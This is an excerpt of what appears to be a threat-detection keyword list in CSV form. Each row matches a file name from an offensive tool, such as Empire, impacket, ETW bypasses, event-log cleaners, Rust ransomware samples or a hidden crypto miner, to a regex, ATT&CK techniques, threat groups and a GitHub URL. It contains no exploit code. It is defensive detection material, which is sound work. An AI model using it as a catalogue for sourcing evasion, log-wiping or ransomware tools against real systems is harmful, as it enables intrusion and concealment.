"*\elusiveMice.cna*",".{0,1000}\\elusiveMice\.cna.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","15262"
"*\emailall.py*",".{0,1000}\\emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","15263"
"*\empire_exec.py*",".{0,1000}\\empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15266"
"*\empire_stager.cmd*",".{0,1000}\\empire_stager\.cmd.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","15267"
"*\EmpireCompiler.dll*",".{0,1000}\\EmpireCompiler\.dll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","15268"
"*\enable_all_tokens.exe*",".{0,1000}\\enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15270"
"*\EnableAllMacros_AMSI.py*",".{0,1000}\\EnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15271"
"*\EnableAllMacros_AMSI.vba*",".{0,1000}\\EnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15272"
"*\EnableAllTokenPrivs.cs*",".{0,1000}\\EnableAllTokenPrivs\.cs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15273"
"*\EnableAllTokenPrivs.exe*",".{0,1000}\\EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15274"
"*\EnableAllTokenPrivs.ps1*",".{0,1000}\\EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15275"
"*\enable-defender.exe*",".{0,1000}\\enable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","15276"
"*\Enable-DuplicateToken.ps1*",".{0,1000}\\Enable\-DuplicateToken\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15277"
"*\enc_shellcode.bin*",".{0,1000}\\enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15278"
"*\enc_shellcode.h*",".{0,1000}\\enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15279"
"*\enc-rot13.ps1*",".{0,1000}\\enc\-rot13\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15280"
"*\Encryfer-X.exe*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15281"
"*\Encryfer-X\*",".{0,1000}\\Encryfer\-X\\.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15282"
"*\Encrypor-X.exe*",".{0,1000}\\Encrypor\-X\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15283"
"*\EncryptedZIP.exe*",".{0,1000}\\EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15284"
"*\encrypthub_steal.ps1*",".{0,1000}\\encrypthub_steal\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","15285"
"*\encryption_aes.exe*",".{0,1000}\\encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15286"
"*\encryption_rc4.exe*",".{0,1000}\\encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15287"
"*\Encyfer-X-Decryptor*",".{0,1000}\\Encyfer\-X\-Decryptor.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15288"
"*\endpoint_takeover.py*",".{0,1000}\\endpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15289"
"*\enterprise_admins.txt*",".{0,1000}\\enterprise_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","15290"
"*\enum_av.py*",".{0,1000}\\enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15291"
"*\enum_dns.py*",".{0,1000}\\enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15292"
"*\enum_installed_software.py*",".{0,1000}\\enum_installed_software\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15293"
"*\enum4linux.py*",".{0,1000}\\enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15294"
"*\EnumBrowsers.ps1*",".{0,1000}\\EnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15295"
"*\EnumerateDCs.ahk*",".{0,1000}\\EnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15296"
"*\enumeration_process.exe*",".{0,1000}\\enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15297"
"*\erawtfoS\UCKH*",".{0,1000}\\erawtfoS\\UCKH.{0,1000}","offensive_tool_keyword","powershell","reverse string registry pattern","T1059","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","15306"
"*\ES.Alan.Core*",".{0,1000}\\ES\.Alan\.Core.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","15307"
"*\esentutl.py*",".{0,1000}\\esentutl\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15308"
"*\EternalHushCore.dll*",".{0,1000}\\EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","15309"
"*\EternalHushCore\*",".{0,1000}\\EternalHushCore\\.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","15310"
"*\ethminer.exe*",".{0,1000}\\ethminer\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","15311"
"*\etw-fuck.cpp*",".{0,1000}\\etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","15312"
"*\etw-fuck.exe*",".{0,1000}\\etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","15313"
"*\ETWHash.*",".{0,1000}\\ETWHash\..{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","15314"
"*\ETWpatch\eventK.exe*",".{0,1000}\\ETWpatch\\eventK\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15315"
"*\etwunhook.cpp*",".{0,1000}\\etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","15316"
"*\etwunhook.exe*",".{0,1000}\\etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","15317"
"*\Evasion\Sandbox Evasion\*.c*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","15318"
"*\Evasion\Sandbox Evasion\*.exe*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","15319"
"*\EventCleaner.cpp*",".{0,1000}\\EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15320"
"*\EventCleaner.exe*",".{0,1000}\\EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15321"
"*\EventCleaner.log*",".{0,1000}\\EventCleaner\.log.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15322"
"*\EventCleaner.pdb*",".{0,1000}\\EventCleaner\.pdb.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15323"
"*\EventCleaner.sln*",".{0,1000}\\EventCleaner\.sln.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15324"
"*\EventCleaner-master*",".{0,1000}\\EventCleaner\-master.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15325"
"*\EventLogCrasher\*",".{0,1000}\\EventLogCrasher\\.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","15327"
"*\EventLogCredentials.ps1*",".{0,1000}\\EventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15328"
"*\Eventlogedit-evtx--Evolution-master-v1.1*",".{0,1000}\\Eventlogedit\-evtx\-\-Evolution\-master\-v1\.1.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","15329"
"*\EventLogMaster.cna*",".{0,1000}\\EventLogMaster\.cna.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15330"
"*\EventLogMaster-master*",".{0,1000}\\EventLogMaster\-master.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15331"
"*\EventViewer-UACBypass*",".{0,1000}\\EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","15332"
